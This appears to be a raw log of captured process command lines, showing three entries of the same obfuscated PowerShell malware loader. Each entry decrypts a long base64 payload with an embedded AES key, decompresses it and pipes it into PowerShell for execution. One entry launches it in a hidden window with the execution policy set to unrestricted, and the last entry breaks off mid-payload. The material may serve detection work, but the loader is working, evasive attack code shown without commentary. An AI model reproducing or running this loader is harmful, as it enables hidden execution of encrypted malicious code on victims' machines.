cmdline	C:\Windows\System32\cmd.exe /c powershell.exe $Ibhr = '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';$ynfvCucL = 'R0piaVFud0pweHlla0R6cHVqcEV5QnpobmZYdkV5UGg=';$wHuBLdg = New-Object 'System.Security.Cryptography.AesManaged';$wHuBLdg.Mode = [System.Security.Cryptography.CipherMode]::ECB;$wHuBLdg.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$wHuBLdg.BlockSize = 128;$wHuBLdg.KeySize = 256;$wHuBLdg.Key = [System.Convert]::FromBase64String($ynfvCucL);$VaVjY = [System.Convert]::FromBase64String($Ibhr);$rXaMmEYL = $VaVjY[0..15];$wHuBLdg.IV = $rXaMmEYL;$oiEgKgyJf = $wHuBLdg.CreateDecryptor();$SxPDGLzVD = $oiEgKgyJf.TransformFinalBlock($VaVjY, 16, $VaVjY.Length - 16);$wHuBLdg.Dispose();$BiPumZcr = New-Object System.IO.MemoryStream( , $SxPDGLzVD );$NxNSfxy = New-Object System.IO.MemoryStream;$JeEsnJwpr = New-Object System.IO.Compression.GzipStream $BiPumZcr, ([IO.Compression.CompressionMode]::Decompress);$JeEsnJwpr.CopyTo( $NxNSfxy );$JeEsnJwpr.Close();$BiPumZcr.Close();[byte[]] $PiONcl = $NxNSfxy.ToArray();$Larju = [System.Text.Encoding]::UTF8.GetString($PiONcl);$Larju \| powershell -
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $Ibhr = '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';$ynfvCucL = 'R0piaVFud0pweHlla0R6cHVqcEV5QnpobmZYdkV5UGg=';$wHuBLdg = New-Object 'System.Security.Cryptography.AesManaged';$wHuBLdg.Mode = [System.Security.Cryptography.CipherMode]::ECB;$wHuBLdg.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$wHuBLdg.BlockSize = 128;$wHuBLdg.KeySize = 256;$wHuBLdg.Key = [System.Convert]::FromBase64String($ynfvCucL);$VaVjY = [System.Convert]::FromBase64String($Ibhr);$rXaMmEYL = $VaVjY[0..15];$wHuBLdg.IV = $rXaMmEYL;$oiEgKgyJf = $wHuBLdg.CreateDecryptor();$SxPDGLzVD = $oiEgKgyJf.TransformFinalBlock($VaVjY, 16, $VaVjY.Length - 16);$wHuBLdg.Dispose();$BiPumZcr = New-Object System.IO.MemoryStream( , $SxPDGLzVD );$NxNSfxy = New-Object System.IO.MemoryStream;$JeEsnJwpr = New-Object System.IO.Compression.GzipStream $BiPumZcr, ([IO.Compression.CompressionMode]::Decompress);$JeEsnJwpr.CopyTo( $NxNSfxy );$JeEsnJwpr.Close();$BiPumZcr.Close();[byte[]] $PiONcl = $NxNSfxy.ToArray();$Larju = [System.Text.Encoding]::UTF8.GetString($PiONcl);$Larju \| powershell - }
cmdline	"C:\Windows\system32\cmd.exe" /c powershell.exe $Ibhr = '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